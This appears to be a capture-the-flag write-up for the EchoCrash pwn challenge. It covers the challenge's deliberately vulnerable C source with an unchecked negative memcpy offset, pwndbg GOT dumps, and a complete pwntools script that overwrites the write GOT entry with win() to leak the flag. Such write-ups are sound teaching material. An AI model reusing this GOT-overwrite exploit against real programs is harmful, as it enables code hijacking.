EchoCrash

GOT overwrite with negative indexing

Analysis

We are given the source code chall.c which processes two packets and reassembles them in a global variable called global_buffer of 0x200 size.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>

#define BUF_SIZE 0x200
#define START_CHUNK 1
#define CONT_CHUNK 2
#define HEADER_SIZE 5

uint8_t global_buffer[BUF_SIZE];

void win() {
	FILE *f = fopen("./flag.txt", "r");
	fseek(f, 0, SEEK_END);
	size_t sz = ftell(f);
	fseek(f, 0, SEEK_SET);
	char* flag = malloc(sz);
	fread(flag, sz, 1, f);
	fclose(f);
	puts(flag);
}

void send_checksum(uint8_t *data, size_t len) {
    uint64_t checksum = 0;
    for (size_t i = 0; i < len; ++i)
        checksum += data[i];
    write(1, &checksum, sizeof(checksum));
}

void handle_packet(int fd) {
    uint8_t header[HEADER_SIZE];
    uint8_t packet_data[BUF_SIZE];
    int start_seen = 0;

    while (1) {
        if (read(fd, header, HEADER_SIZE) != HEADER_SIZE) break;

        int8_t type = header[0];
        int16_t size = *(int16_t*)(header + 1);
        int16_t buffer_offset = *(int16_t*)(header + 3);

        if (size > BUF_SIZE - HEADER_SIZE) continue; // basic sanity

        if (read(fd, packet_data, size) != size) break;

        if (type == START_CHUNK) {
            memset(global_buffer, 0, BUF_SIZE);
            buffer_offset = 0;
            start_seen = 1;
        }

        if (!start_seen) continue;
        // NO CHECK AFTER FIRST PACKET
        memcpy(global_buffer + buffer_offset, packet_data, size);

        if (buffer_offset > 0x180) {
            send_checksum(global_buffer, buffer_offset);
            break;
        }
    }
}

int main() {

	setbuf(stdin, 0);
	setbuf(stdout, 0);

    puts("EchoCrash v1.0");
    puts("Send fragmented payloads. Type=1 to start, 2 to continue.");
    puts("Checksum will be returned once buffer crosses 0x180 bytes.");
    handle_packet(0);
    return 0;
}

However the buffer offset is only checked if its the first packet (START_CHUNK), which means we can do negative indexing to overwrite some other memory addresses through memcpy.

Using pwndbg, we can spot that the GOT is writable.

pwndbg> got
Filtering out read-only entries (display them with -r or --show-readonly)

State of the GOT of /home/kali/Desktop/CTF-New/greywelcome/dist-echocrash/chall_patched:
GOT protection: Partial RELRO | Found 14 GOT entries passing the filter
[0x404018] puts@GLIBC_2.2.5 -> 0x7ffff7e2b5a0 (puts) ◂— push r14
[0x404020] fread@GLIBC_2.2.5 -> 0x401040 ◂— endbr64 
[0x404028] write@GLIBC_2.2.5 -> 0x401050 ◂— endbr64 
[0x404030] fclose@GLIBC_2.2.5 -> 0x401060 ◂— endbr64 
[0x404038] __stack_chk_fail@GLIBC_2.4 -> 0x401070 ◂— endbr64 
[0x404040] memset@GLIBC_2.2.5 -> 0x401080 ◂— endbr64 
[0x404048] alarm@GLIBC_2.2.5 -> 0x7ffff7e882b0 (alarm) ◂— mov eax, 0x25
[0x404050] read@GLIBC_2.2.5 -> 0x7ffff7eaee90 (read) ◂— sub rsp, 0x10
[0x404058] ftell@GLIBC_2.2.5 -> 0x4010b0 ◂— endbr64 
[0x404060] memcpy@GLIBC_2.14 -> 0x4010c0 ◂— endbr64 
[0x404068] malloc@GLIBC_2.2.5 -> 0x4010d0 ◂— endbr64 
[0x404070] fseek@GLIBC_2.2.5 -> 0x4010e0 ◂— endbr64 
[0x404078] setvbuf@GLIBC_2.2.5 -> 0x7ffff7e2bd50 (setvbuf) ◂— push r13
[0x404080] fopen@GLIBC_2.2.5 -> 0x401100 ◂— endbr64 
pwndbg> 

We can perform a GOT overwrite attack by replacing a GOT entry with the address of win to print the flag.

We can verify that global_buffer is 0x40 bytes from the last GOT entry.

pwndbg> p/x &global_buffer 
$1 = 0x4040c0
pwndbg> got
Filtering out read-only entries (display them with -r or --show-readonly)

State of the GOT of /home/kali/Desktop/CTF-New/greywelcome/dist-echocrash/chall_patched:
GOT protection: Partial RELRO | Found 14 GOT entries passing the filter
[0x404018] puts@GLIBC_2.2.5 -> 0x7ffff7e2b5a0 (puts) ◂— push r14
[0x404020] fread@GLIBC_2.2.5 -> 0x401040 ◂— endbr64 
[0x404028] write@GLIBC_2.2.5 -> 0x401050 ◂— endbr64 
[0x404030] fclose@GLIBC_2.2.5 -> 0x401060 ◂— endbr64 
[0x404038] __stack_chk_fail@GLIBC_2.4 -> 0x401070 ◂— endbr64 
[0x404040] memset@GLIBC_2.2.5 -> 0x401080 ◂— endbr64 
[0x404048] alarm@GLIBC_2.2.5 -> 0x7ffff7e882b0 (alarm) ◂— mov eax, 0x25
[0x404050] read@GLIBC_2.2.5 -> 0x7ffff7eaee90 (read) ◂— sub rsp, 0x10
[0x404058] ftell@GLIBC_2.2.5 -> 0x4010b0 ◂— endbr64 
[0x404060] memcpy@GLIBC_2.14 -> 0x4010c0 ◂— endbr64 
[0x404068] malloc@GLIBC_2.2.5 -> 0x4010d0 ◂— endbr64 
[0x404070] fseek@GLIBC_2.2.5 -> 0x4010e0 ◂— endbr64 
[0x404078] setvbuf@GLIBC_2.2.5 -> 0x7ffff7e2bd50 (setvbuf) ◂— push r13
[0x404080] fopen@GLIBC_2.2.5 -> 0x401100 ◂— endbr64 
pwndbg> p/x 0x4040c0-0x404080
$2 = 0x40
pwndbg> 

The write function is an ideal target since it's only called in send_checksum after the memcpy vulnerability. When we trigger send_checksum, the overwritten GOT entry will redirect write to execute win instead of the actual libc function, giving us the flag.

python3 solve.py REMOTE
[*] '/home/kali/Desktop/CTF-New/greywelcome/dist-echocrash/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[+] Opening connection to challs.nusgreyhats.org on port 35124: Done
[*] Switching to interactive mode
grey{m3mcpy_g0_brrrrrrr_ezpzXD}

Solve Script

#!/usr/bin/env python3
from pwn import *

elf = ELF('./chall')
p = remote('challs.nusgreyhats.org', 35124) if args.REMOTE else process('./chall')

# Addresses
win = elf.symbols['win']
write_got = elf.got['write']
global_buffer = 0x4040c0

# Calculate negative offset: write_got - global_buffer = -152
offset = write_got - global_buffer

p.recvuntil(b"0x180 bytes.\n")

# First packet
p.send(p8(1) + p16(4) + p16(0) + b"AAAA")

# GOT overwrite
p.send(p8(2) + p16(8) + p16(offset & 0xffff) + p64(win))

# Trigger exceed 0x180 for send_checksum()
p.send(p8(2) + p16(4) + p16(0x185) + b"BBBB")

p.interactive()